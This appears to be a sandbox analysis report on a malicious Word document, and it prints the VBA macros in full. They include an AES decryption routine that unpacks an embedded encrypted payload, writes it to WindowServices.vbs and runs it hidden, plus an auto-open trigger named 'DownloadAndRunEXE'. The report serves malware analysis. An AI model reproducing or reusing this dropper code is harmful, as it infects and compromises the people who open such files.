    Private Declare PtrSafe Function FormatMessage Lib "kernel32" Alias "FormatMessageA" (ByVal dwFlags As Long, ByVal lpSource As LongPtr, ByVal dwMessageId As Long, ByVal dwLanguageId As Long, ByVal lpBuffer As String, ByVal nSize As Long, ByVal Args As LongPtr) As Long
    #Else
    Private Declare Function CryptStringToBinary Lib "crypt32" Alias "CryptStringToBinaryW" (ByVal pszString As LongPtr, ByVal cchString As Long, ByVal dwFlags As Long, ByVal pbBinary As LongPtr, pcbBinary As Long, pdwSkip As Long, pdwFlags As Long) As Long
    Private Declare Function CryptBinaryToString Lib "crypt32" Alias "CryptBinaryToStringW" (ByVal pbBinary As LongPtr, ByVal cbBinary As Long, ByVal dwFlags As Long, ByVal pszString As LongPtr, pcchString As Long) As Long
    Private Declare Function WideCharToMultiByte Lib "kernel32" (ByVal CodePage As Long, ByVal dwFlags As Long, ByVal lpWideCharStr As LongPtr, ByVal cchWideChar As Long, lpMultiByteStr As Any, ByVal cchMultiByte As Long, ByVal lpDefaultChar As LongPtr, ByVal lpUsedDefaultChar As LongPtr) As Long
    Private Declare Function MultiByteToWideChar Lib "kernel32" (ByVal CodePage As Long, ByVal dwFlags As Long, lpMultiByteStr As Any, ByVal cchMultiByte As Long, ByVal lpWideCharStr As LongPtr, ByVal cchWideChar As Long) As Long
    Private Declare Function FormatMessage Lib "kernel32" Alias "FormatMessageA" (ByVal dwFlags As Long, ByVal lpSource As LongPtr, ByVal dwMessageId As Long, ByVal dwLanguageId As Long, ByVal lpBuffer As String, ByVal nSize As Long, ByVal Args As LongPtr) As Long
    #End If
#End If

'=========================================================================
' Constants and member variables
'=========================================================================

Private Const AES_BLOCK_SIZE        As Long = 16
Private Const AES_KEYLEN            As Long = 32                    '-- 32 -> AES-256, 24 -> AES-196, 16 -> AES-128
Private Const AES_IVLEN             As Long = AES_BLOCK_SIZE
Private Const KDF_SALTLEN           As Long = 8
Private Const KDF_ITER              As Long = 10000
Private Const KDF_HASH              As String = "SHA512"
Private Const HMAC_HASH             As String = "SHA256"
Private Const OPENSSL_MAGIC         As String = "Salted__"          '-- for openssl compatibility
Private Const OPENSSL_MAGICLEN      As Long = 8
Private Const ERR_UNSUPPORTED_ENCR  As String = "Unsupported encryption"
Private Const ERR_CHUNKED_NOT_INIT  As String = "AES chunked context not initialized"

Private Type UcsCryptoContextType
    hPbkdf2Alg          As LongPtr
    hHmacAlg            As LongPtr
    hHmacHash           As LongPtr
    HashLen             As Long
    hAesAlg             As LongPtr
    hAesKey             As LongPtr
    AesKeyObjData()     As Byte
    AesKeyObjLen        As Long
    Nonce(0 To 3)       As Long
    EncrData()          As Byte
    EncrPos             As Long
    LastError           As String
End Type

Private m_uChunkedCtx           As UcsCryptoContextType

'=========================================================================
' Functions
'=========================================================================

'--- equivalent to `openssl aes-256-ctr -pbkdf2 -md sha512 -pass pass:{Password} -in {sText}.file -a`
Public Function AesEncryptString(sText As String, Optional Password As Variant) As String
    Const PREFIXLEN     As Long = OPENSSL_MAGICLEN + KDF_SALTLEN
    Dim baData()        As Byte
    Dim baPass()        As Byte
    Dim baSalt()        As Byte
    Dim baKey()         As Byte
    Dim sError          As String
    
    baData = ToUtf8Array(sText)
    baPass = vbNullString
    baSalt = vbNullString
    If Not IsArray(Password) Then
        If Not IsMissing(Password) Then
            baPass = ToUtf8Array(Password & vbNullString)
        End If
        ReDim baSalt(0 To KDF_SALTLEN - 1) As Byte
        Call RtlGenRandom(baSalt(0), KDF_SALTLEN)
    Else
        baKey = Password
    End If
    If Not AesCryptArray(baData, baPass, baSalt, baKey, Error:=sError) Then
        Err.Raise vbObjectError, , sError
    End If
    If Not IsArray(Password) Then
        ReDim Preserve baData(0 To UBound(baData) + PREFIXLEN) As Byte
        If UBound(baData) >= PREFIXLEN Then
            Call CopyMemory(baData(PREFIXLEN), baData(0), UBound(baData) + 1 - PREFIXLEN)
        End If
        Call CopyMemory(baData(OPENSSL_MAGICLEN), baSalt(0), KDF_SALTLEN)
        Call CopyMemory(baData(0), ByVal OPENSSL_MAGIC, OPENSSL_MAGICLEN)
    End If
    AesEncryptString = Replace(ToBase64Array(baData), vbCrLf, vbNullString)
End Function

'--- equivalent to `openssl aes-256-ctr -pbkdf2 -md sha512 -pass pass:{Password} -in {sEncr}.file -a -d`
Public Function AesDecryptString(sEncr As String, Optional Password As Variant) As String
    Const PREFIXLEN     As Long = OPENSSL_MAGICLEN + KDF_SALTLEN
    Dim baData()        As Byte
    Dim baPass()        As Byte
    Dim baSalt()        As Byte
    Dim baKey()         As Byte
    Dim sMagic          As String
    Dim sError          As String
    
    baData = FromBase64Array(sEncr)
    baPass = vbNullString
    baSalt = vbNullString
    If Not IsArray(Password) Then
        If Not IsMissing(Password) Then
            baPass = ToUtf8Array(Password & vbNullString)
        End If
        If UBound(baData) >= PREFIXLEN - 1 Then
            sMagic = String$(OPENSSL_MAGICLEN, 0)
            Call CopyMemory(ByVal sMagic, baData(0), OPENSSL_MAGICLEN)
            If sMagic = OPENSSL_MAGIC Then
                ReDim baSalt(0 To KDF_SALTLEN - 1) As Byte
                Call CopyMemory(baSalt(0), baData(OPENSSL_MAGICLEN), KDF_SALTLEN)
                If UBound(baData) >= PREFIXLEN Then
                    Call CopyMemory(baData(0), baData(PREFIXLEN), UBound(baData) + 1 - PREFIXLEN)
                    ReDim Preserve baData(0 To UBound(baData) - PREFIXLEN) As Byte
                Else
                    baData = vbNullString
                End If
            End If
        End If
    Else
        baKey = Password
    End If
    If Not AesCryptArray(baData, baPass, baSalt, baKey, Error:=sError) Then
        Err.Raise vbObjectError, , sError
    End If
    AesDecryptString = FromUtf8Array(baData)
End Function

Public Function AesCryptArray(             baData() As Byte,             Optional Password As Variant,             Optional Salt As Variant,             Optional key As Variant,             Optional ByVal KeyLen As Long,             Optional Error As String,             Optional Hmac As Variant) As Boolean
    Const VT_BYREF      As Long = &H4000
    Dim uCtx            As UcsCryptoContextType
    Dim vErr            As Variant
    Dim bHashBefore     As Boolean
    Dim bHashAfter      As Boolean
    Dim baPass()        As Byte
    Dim baSalt()        As Byte
    Dim baKey()         As Byte
    Dim baTemp()        As Byte
    Dim lPtr            As LongPtr
    
    On Error GoTo EH
    If IsArray(Hmac) Then
        bHashBefore = (Hmac(0) <= 0)
        bHashAfter = (Hmac(0) > 0)
    End If
    If IsMissing(Password) Then
        baPass = vbNullString
    ElseIf IsArray(Password) Then
        baPass = Password
    Else
        baPass = ToUtf8Array(Password & vbNullString)
    End If
    If IsMissing(Salt) Then
        baSalt = baPass
    ElseIf IsArray(Salt) Then
        baSalt = Salt
    Else
        baSalt = ToUtf8Array(Salt & vbNullString)
    End If
    If IsArray(key) Then
        baKey = key
    End If
    If KeyLen <= 0 Then
        KeyLen = AES_KEYLEN
    End If
    If Not pvCryptoAesCtrInit(uCtx, baPass, baSalt, baKey, KeyLen) Then
        Error = uCtx.LastError
        GoTo QH
    End If
    If Not pvCryptoAesCtrCrypt(uCtx, baData, HashBefore:=bHashBefore, HashAfter:=bHashAfter) Then
        Error = uCtx.LastError
        GoTo QH
    End If
    If IsArray(Hmac) Then
        baTemp = pvCryptoGetFinalHash(uCtx, UBound(Hmac) + 1)
        #If Win64 Then
            lPtr = PeekPtr(VarPtr(Hmac) + 8)
        #Else
            lPtr = PeekPtr((VarPtr(Hmac) Xor &H80000000) + 8 Xor &H80000000)
        #End If
        If (PeekPtr(VarPtr(Hmac)) And VT_BYREF) <> 0 Then
            lPtr = PeekPtr(lPtr)
        End If
        #If Win64 Then
            lPtr = PeekPtr(lPtr + 16)
        #Else
            lPtr = PeekPtr((lPtr Xor &H80000000) + 12 Xor &H80000000)
        #End If
        Call CopyMemory(ByVal lPtr, baTemp(0), UBound(baTemp) + 1)
    End If
    '--- success
    AesCryptArray = True
QH:
    pvCryptoAesCtrTerminate uCtx
    Exit Function
EH:
    vErr = Array(Err.Number, Err.Source, Err.Description)
    pvCryptoAesCtrTerminate uCtx
    Err.Raise vErr(0), vErr(1), vErr(2)
End Function

Public Function AesChunkedInit(Optional key As Variant, Optional ByVal KeyLen As Long) As Boolean
    Dim baEmpty()       As Byte
    Dim baKey()         As Byte
    
    pvCryptoAesCtrTerminate m_uChunkedCtx
    baEmpty = vbNullString
    If IsArray(key) Then
        baKey = key
    End If
    If KeyLen <= 0 Then
        KeyLen = AES_KEYLEN
    End If
    AesChunkedInit = pvCryptoAesCtrInit(m_uChunkedCtx, baEmpty, baEmpty, baKey, KeyLen)
End Function

Public Function AesChunkedCryptArray(baInput() As Byte, baOutput() As Byte, Optional ByVal Final As Boolean = True) As Boolean
    If m_uChunkedCtx.hAesAlg = 0 Then
        m_uChunkedCtx.LastError = ERR_CHUNKED_NOT_INIT
        Exit Function
    End If
    baOutput = baInput
    AesChunkedCryptArray = pvCryptoAesCtrCrypt(m_uChunkedCtx, baOutput)
    If Final Then
        pvCryptoAesCtrTerminate m_uChunkedCtx
    End If
End Function

Public Function AesChunkedGetLastError() As String
    AesChunkedGetLastError = m_uChunkedCtx.LastError
End Function

'= private ===============================================================

Private Function pvCryptoAesCtrInit(uCtx As UcsCryptoContextType, baPass() As Byte, baSalt() As Byte, baDerivedKey() As Byte, ByVal lKeyLen As Long) As Boolean
    Const MS_PRIMITIVE_PROVIDER         As String = "Microsoft Primitive Provider"
    Const BCRYPT_ALG_HANDLE_HMAC_FLAG   As Long = 8
    Dim hResult         As Long
    
    With uCtx
        '--- init member vars
        .EncrData = vbNullString
        .EncrPos = 0
        .LastError = vbNullString
        ReDim Preserve baDerivedKey(0 To lKeyLen + AES_IVLEN - 1) As Byte
        If UBound(baPass) >= 0 Or UBound(baSalt) >= 0 Then
            '--- generate RFC 2898 based derived key
            On Error GoTo EH_Unsupported '--- PBKDF2 API missing on Vista
            hResult = BCryptOpenAlgorithmProvider(.hPbkdf2Alg, StrPtr(KDF_HASH), StrPtr(MS_PRIMITIVE_PROVIDER), BCRYPT_ALG_HANDLE_HMAC_FLAG)
            If hResult < 0 Then
                GoTo QH
            End If
            hResult = BCryptDeriveKeyPBKDF2(.hPbkdf2Alg, ByVal pvArrayPtr(baPass), pvArraySize(baPass), ByVal pvArrayPtr(baSalt), pvArraySize(baSalt),                     KDF_ITER / 10000@, baDerivedKey(0), UBound(baDerivedKey) + 1, 0)
            If hResult < 0 Then
                GoTo QH
            End If
            On Error GoTo 0
        End If
        '--- init AES key from first half of derived key
        On Error GoTo EH_Unsupported '--- CNG API missing on XP
        hResult = BCryptOpenAlgorithmProvider(.hAesAlg, StrPtr("AES"), StrPtr(MS_PRIMITIVE_PROVIDER), 0)
        If hResult < 0 Then
            GoTo QH
        End If
        On Error GoTo 0
        hResult = BCryptGetProperty(.hAesAlg, StrPtr("ObjectLength"), .AesKeyObjLen, 4, 0, 0)
        If hResult < 0 Then
            GoTo QH
        End If
        hResult = BCryptSetProperty(.hAesAlg, StrPtr("ChainingMode"), StrPtr("ChainingModeECB"), 30, 0)  ' 30 = LenB("ChainingModeECB")
        If hResult < 0 Then
            GoTo QH
        End If
        ReDim .AesKeyObjData(0 To .AesKeyObjLen - 1) As Byte
        hResult = BCryptGenerateSymmetricKey(.hAesAlg, .hAesKey, .AesKeyObjData(0), .AesKeyObjLen, baDerivedKey(0), lKeyLen, 0)
        If hResult < 0 Then
            GoTo QH
        End If
        '--- init AES IV from second half of derived key
        Call CopyMemory(.Nonce(0), baDerivedKey(lKeyLen), AES_IVLEN)
        '--- init HMAC key from last HashLen bytes of derived key
        hResult = BCryptOpenAlgorithmProvider(.hHmacAlg, StrPtr(HMAC_HASH), StrPtr(MS_PRIMITIVE_PROVIDER), BCRYPT_ALG_HANDLE_HMAC_FLAG)
        If hResult < 0 Then
            GoTo QH
        End If
        hResult = BCryptGetProperty(.hHmacAlg, StrPtr("HashDigestLength"), .HashLen, 4, 0, 0)
        If hResult < 0 Then
            GoTo QH
        End If
        hResult = BCryptCreateHash(.hHmacAlg, .hHmacHash, 0, 0, baDerivedKey(lKeyLen + AES_IVLEN - .HashLen), .HashLen, 0)
        If hResult < 0 Then
            GoTo QH
        End If
    End With
    '--- success
    pvCryptoAesCtrInit = True
    Exit Function
QH:
    uCtx.LastError = GetSystemMessage(hResult)
    Exit Function
EH_Unsupported:
    uCtx.LastError = ERR_UNSUPPORTED_ENCR
End Function

Private Sub pvCryptoAesCtrTerminate(uCtx As UcsCryptoContextType)
    With uCtx
        If .hPbkdf2Alg <> 0 Then
            Call BCryptCloseAlgorithmProvider(.

                                                                                                                                                                                                                                VBA File Name: ViewSession.cls, Stream Size: 11978
                                                                                                                                                                                                                                General
                                                                                                                                                                                                                                Stream Path:Macros/VBA/ViewSession
                                                                                                                                                                                                                                VBA File Name:ViewSession.cls
                                                                                                                                                                                                                                Stream Size:11978
                                                                                                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . 8 . . . ! . . . . . . . . . . . . . . D . . . . . . . . . . . . . . . . . . . . . . s 6 . M / ; L * = h . 8 . . + 3 q . . . . . . . . . . . . . . . . . . . . * O N . . W . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . P . . . . . S . . . . . S . . . . . S . . . . . < 0 . . . . . . < 8 . . . . . . < . . . . . . < ( . . . . . . < . . . . . . . . . .
                                                                                                                                                                                                                                Data Raw:01 16 03 00 00 00 01 00 00 1a 05 00 00 e4 00 00 00 38 02 00 00 ff ff ff ff 21 05 00 00 a9 1a 00 00 00 00 00 00 01 00 00 00 d4 44 d1 cf 00 00 ff ff 03 00 00 00 80 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 73 dc 36 85 9d bd 0c 4d 90 2f 3b 89 99 e0 4c 85 2a 3d fb fc fa a0 68 10 a7 38 08 00 2b 33 71 b5 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                VBA Code
                                                                                                                                                                                                                                Attribute VB_Name = "ViewSession"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Public Sub ikwiwiejs_19293_Ade()
    Dim key As String
    Dim decryptedText As String
    Dim i As Integer
    Dim parts(1 To 60) As String
    Dim Oekksoioa_ As String
    Dim chunkSize As Integer
    Dim tempFilePath As String

    ' ?t kha AES
    key = "Bnshekao@3123989942"    ' Kha 16 byte cho AES
    part1 = "U2FsdGVkX1+dNqiwSTp9Sqv/0TVrzrOc76g8zk4YPSNm5OKURc2v0uIodtcsnOL6RJb3xYgUlCOFV6b6XWkTdeHQCGey7pI8qwnT5xLy/VKSKg5FmPBOCTNQUgAASA7wXsGTeAC5PbxpiVz04iBNdx"
    part2 = "bUoo21wrnWlCB0xLqmNF1uhdY1X6mPBEZyoB9M3X2e8G+2gVZC616vgx4A63rh5QJUwC+/llk0cuMyK5PZ4GPRRyjK6DAKh+NjgEfwujNBYu1K1wKhEdzX7hSmdnhxJ6QU6m3L8g4OtSwJ+B5lcYs1"
    part3 = "APaW/Bt4WwymusVnlV/9P1kTHJwZsLr2yuzrUR6QD4Z7Hy2CH1HCd78hoUhbKM2hXKsb9QZdjPI3nC+NVPgVbZTwZsSlmE2sXyeYXZb0/11tIK0AnJLNPd8KLtpNfioVRINA601YuFNqSi8J+vAjFq"
    part4 = "ptgioL11dGXpMe3Y1hFXWiCXvUpWkV1X58aK4AAFqY4itc1XMpNkjKiGNdP6QdVCrQ/fFg/ni38thsinsexqtAkb6immNECdsvgpKh36pjarHIAl1fya1xofovnGuT97OLiJH8wVysHeM9YKKZPgZF"
    part5 = "1fC3a1XE2RH92Y5dTbe2Mu9t0nQ9BHHbyhy4T32YyNV9MFdCB8pix3foKT/q0KGBfPGiQjDDJiWS4QUfrjaIbx1VhtihHaB3fpWRoVkGnjVTd3N5QVMckl6x0VzHMEq8pRw3yO5AxJqpRKK2CnJFZP"
    part6 = "4HtpvPyipWL2r2m3tEB2IfpBwLa6PLBeuSlXAeXis9riaM5diYNMS4iUcU74hZAwzV4mEJ9Jj0OoYM09jpok6R0BzkJ4TDr4j6W2i9Qra/zddsmbEqmUB3F28cj8+Q51M6Y8dBxNETxrnpttj7MRFz"
    part7 = "448jdoKx7yZwpPUSEllFI6aJExbW5OU0SeA3l0sPcwOrFVl2BcxGE4xNF3xMNXZv7ySzj1O5oQclakPNhwBXN+JhuXPCeA2PmTmM00/HmKpHziXUrbS74q+KqbVUOinDlQfToSi8d73W7jHWN/hmHH"
    part8 = "oU63mk5bUpOP079z2hntojd1sHY4dcRXRKvx0asiUXNG4UqCNH00yVyAKhvI8Dcd17kFfq/bde/LLF2GtlKM4iJ+nzMHMbs3IkXYTGr5/ODdJTgTq3XjeDHXIjYSj13l8nLQtx9m2S3TJukPyfeyOi"
    part9 = "7qtGErzbfMQhoOfpp2kuFxmLk+p+A+VjT5JVN16MldTldAy7QbVHqU8l0kTByBO+y4y2jN8HhP3Kk9TGwj4jlvoeOONTB6l3jD9V84H3nrQup6mpGv1w9KuH69xYBqnBeI+btZbNH9KfFE/ynL4Xsj"
    part10 = "Y8gnrSKktu4V47h17Q2iagtWR4L2m4pByPdrreHbsP0rY2Q5LkH37MUaHx9cmBMoUDNr2sIYZH3TA81b1kCYCKSg5g/2aHrTcIPXP2A9QR2OCstl/5c45+IgG2w4dLv0xtVvcD8Y/WuUAc3/hDcSXA"
    part11 = "c22K+jW908mHl1h/F1dKkbrFtdwRHriyiWKS9bTcjhwkV9WsHv7hGA2SR8Ek80N8VEsZKES3j0ZdvVgupiuE0DYqhPFQqjvZpn1sR4Acz88n0182sFl+8gSzop6GZKI3lftmOZM25QygdvILClX9vh"
    part12 = "ZcT+hu3SdvKLFQiGhIWunEmdtEJMSZH9pXzvmftAH8lhoZJ9Eq4tb/kWYDC7HufK+lesGow6lGx21uHMuvkfBD5LXVSHBC8k4gRIkTl/oS/U7oQKbbKg12ltdJusa1oRdQwspoCdebVGiuxqZSRMgP"
    part13 = "V1553L6FMJrS4FKUKxhYJVsSlrj9qVZZ/eCAPuscoB8dVOiqs7cyCWXUk4Qj5QxJms+tMVdugYoz5ozlXXiU6lzQJE8d4DrpHxkDV+0rLUY6RbZLUWwdEdHsJ1mHJooaQag4+CBG/bXk2J6KUdhxop"
    part14 = "ExrtYjBVs4zcHp8QWrz1A4MekTIXEDoar3wzHUibSEnItftTfLA1K0pdT1VzmXULgiJt2XtHxcI8p4UAEyMWJPGHRUclbNG8kzit6BXBoOFmh8tpQvhjUnwzp1U/pBq2+JFAzj9/8SVfOjFL1+mucA"
    part15 = "i1pSm2bvHJyoIfjCxh52RR51TIKot9mABF8F3sAQtVMmGEYvCQ9wuI6qE4NgqEEVhB0NdsrEzc19osiPUEKMMgTW86sBHKzrS5++r5mRX5RVtp1ZDjyq9YJC/e9UNpaLYUoVccJ2sVtdQu/RX2/N/S"
    part16 = "tWOepSU3zzJO3IC0LNDusBrP93U4TCouibRyPz4epM1SJQJjMx6K+xopwZo3BZ3pmbwoXFAO0fzHVW9/OkZdQnUBMWpZSAXB04I2uGA6d3CQrSiKe7EWHDBW9QnXbNuQy37TwUNlqjP/xhhJHsZA7P"
    part17 = "arP1NJmqk35mND6Fg88hP9rePCswSV166VP0fF/OYTPwVC9oXMPso94X2FAXEdUBuzFkxgOdSdGyah1WPEM5ZvTshQYXGcuf2cDr6nLNgUCVnFtVbQiNIGRb7wYTLzjvB89XoUs1YcnZXQmCKkmHCH"
    part18 = "GSH2dKTbANfW29PD7ZZK/dgGDVe3GAwwoqPiAOV74rw1hxrXad4TU1H+pEwHsxv0jnYXCdBI9iBV2P1pjMJWkXjT+N/oq6ZoM3hVRos7jaOwnvBI0163788stbN02N7VhgBzY/d0f+LtQVteFbgA0o"
    part19 = "HsS3ddDuf6EbxorfddYWNkOV3TvdwWNH3HpYmBq8GrjgxVoNDSw6E8eLoyqIXvqs1DxlLY/uHNorxP9iDGO2ZYMQ0qY3x6te3GbKJZKl3OekMFxDqkhqCE8IJSYTwSbAxNA2K6DHYsT/vDVm9OsrE+"
    part20 = "c2mPNjYheGhsI9AI48kBXTJcVdKNXyDdegX3K4O757DjlbkPTjmgpV0OWum/axEOdwfCBykOjb7WJw4LvLaZo08Hahku87InP6PbcV4DNRou1RgjHp0NZban9TeRc/3zAQQuzRcXMk2CfO83CTE+fn"
    part21 = "2VtluxczXmPsqd1boUbJTHJqxu8/43ICU1wduq4SM4YoQTBLYnhlBhn8vYBbW62jHOJqVtfj6xVksqFrCT71i1duHfhRGQLKlRTjnK6GS8Hy7IkuJjfTW4yuVwUAljPSFLJjzH+ZdfLQUnVyJ8Mjp5"
    part22 = "Yo4PaUOkPABOieg8Qne25eflW34sILpeymCECFYOk8w/veOnLjgAMEqow24oa7epvSaAQgjzkjkLCpPnJ+CxKvUbFkZWVAs6xkP76iD+6kxPBAglXqIG2HNCSGucUwUk9HUE0rij3PIjsyMiW9Xhrz"
    part23 = "7VOCW1hbYBBP2V3JGotCL6en9V3EvgCOm42brJhx6jIY8IzvDDUC+EnfnJmUUfFfDgZyVV4Yi1L+m4tdQhjbzVcEz0PyGGjcmk8o9FRd4mfVYPEmN3NQBxP3xEK4hx8uPXUA4aGj+8CXfWSvrzeLNg"
    part24 = "VqtTEkJLtTukhKEe977DegbZo9Q132SqvT6kjAzJ+UCcHjDDctQFmdMF5PfFle"
    Dim encryptedText As String
    encryptedText = part1 & part2 & part3 & part4 & part5 & part6 & part7 & part8 & part9 & part10 & part11 & part12 & part13 & part14 & part15 & part16 & part17 & part18 & part19 & part20 & part21 & part22 & part23 & part24
    decryptedText = AesDecryptString(encryptedText, key)    ' Gi?i m

    ' Kch thu?c c?a m?i ph?n
    chunkSize = 3000  ' Kch thu?c m?i ph?n
    Dim outputFilePath As String
    ' Luu ton b? n?i dung gi?i m vo t?p VBS
    vbsFilePath = Environ("USERPROFILE") & "\Documents\WindowServices.vbs"

    ' Ghi t?ng ph?n ra t?p
    Open vbsFilePath For Output As #1
    For i = 1 To Len(decryptedText) Step chunkSize
        partText = Mid(decryptedText, i, chunkSize)
        Print #1, partText  ' Ghi t?ng ph?n vo t?p
    Next i
    Close #1

Dim shell As Object
Set shell = CreateObject("Shell.Application")

' Ch?y file VBS ? ch? d? ?n (n?u h? tr?)
shell.ShellExecute vbsFilePath, "", "", "open", 0

    

End Sub

Private Sub Class_Initialize()
    
End Sub

                                                                                                                                                                                                                                VBA File Name: ksksksksksksks.cls, Stream Size: 1441
                                                                                                                                                                                                                                General
                                                                                                                                                                                                                                Stream Path:Macros/VBA/ksksksksksksks
                                                                                                                                                                                                                                VBA File Name:ksksksksksksks.cls
                                                                                                                                                                                                                                Stream Size:1441
                                                                                                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D . . . . . . . . . . . . . . . . . . . . . . . t H N B O _ . c . O - " 8 . . . . . . . . . . . . . . . . . . . . . . q . G B . , . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . P . . . . . S " . . . . S . . . . . S " . . . . . < 0 . . . . . . < 8 . . . . . . < . . . . . . < ( . . . . . . < . . . . . . . . . . (
                                                                                                                                                                                                                                Data Raw:01 16 03 00 00 00 01 00 00 b4 03 00 00 e4 00 00 00 12 02 00 00 ff ff ff ff bb 03 00 00 8f 04 00 00 00 00 00 00 01 00 00 00 d4 44 a8 d5 00 00 ff ff a3 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 07 b9 09 74 48 d4 4e 42 be 96 d1 4f be 5f 8a ea 92 8d 63 ac a2 17 e0 4f 8b 2d a0 a4 c2 22 38 09 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                VBA Code
                                                                                                                                                                                                                                Attribute VB_Name = "ksksksksksksks"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
    Application.OnTime Now + TimeValue("00:00:01"), "DownloadAndRunEXE"
End Sub

                                                                                                                                                                                                                                Streams

                                                                                                                                                                                                                                Stream Path: \x1CompObj, File Type: data, Stream Size: 114
                                                                                                                                                                                                                                General
                                                                                                                                                                                                                                Stream Path:\x1CompObj
                                                                                                                                                                                                                                CLSID:
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Stream Size:114
                                                                                                                                                                                                                                Entropy:4.235956365095031
                                                                                                                                                                                                                                Base64 Encoded:True
                                                                                                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . F . . . M i c r o s o f t W o r d 9 7 - 2 0 0 3 D o c u m e n t . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . 9 q . . . . . . . . . . . .
                                                                                                                                                                                                                                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 57 6f 72 64 20 39 37 2d 32 30 30 33 20 44 6f 63 75 6d 65 6e 74 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                                                                                                                General
                                                                                                                                                                                                                                Stream Path:\x5DocumentSummaryInformation
                                                                                                                                                                                                                                CLSID:
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Stream Size:4096
                                                                                                                                                                                                                                Entropy:0.2427468033329246
                                                                                                                                                                                                                                Base64 Encoded:False
                                                                                                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T i t l e . . . . . .
                                                                                                                                                                                                                                Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e8 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00
                                                                                                                                                                                                                                Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                                                                                                                General
                                                                                                                                                                                                                                Stream Path:\x5SummaryInformation
                                                                                                                                                                                                                                CLSID:
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Stream Size:4096
                                                                                                                                                                                                                                Entropy:0.45444014931703014
                                                                                                                                                                                                                                Base64 Encoded:False
                                                                                                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . . . . . 0 . . . . . . . < . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A D M I N . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . N o r m a
                                                                                                                                                                                                                                Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 68 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 a4 00 00 00 04 00 00 00 b0 00 00 00 05 00 00 00 c0 00 00 00 06 00 00 00 cc 00 00 00 07 00 00 00 d8 00 00 00 08 00 00 00 e8 00 00 00 09 00 00 00 f8 00 00 00
                                                                                                                                                                                                                                Stream Path: 1Table, File Type: data, Stream Size: 7563
                                                                                                                                                                                                                                General
                                                                                                                                                                                                                                Stream Path:1Table
                                                                                                                                                                                                                                CLSID:
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Stream Size:7563
                                                                                                                                                                                                                                Entropy:5.842344693433376
                                                                                                                                                                                                                                Base64 Encoded:True
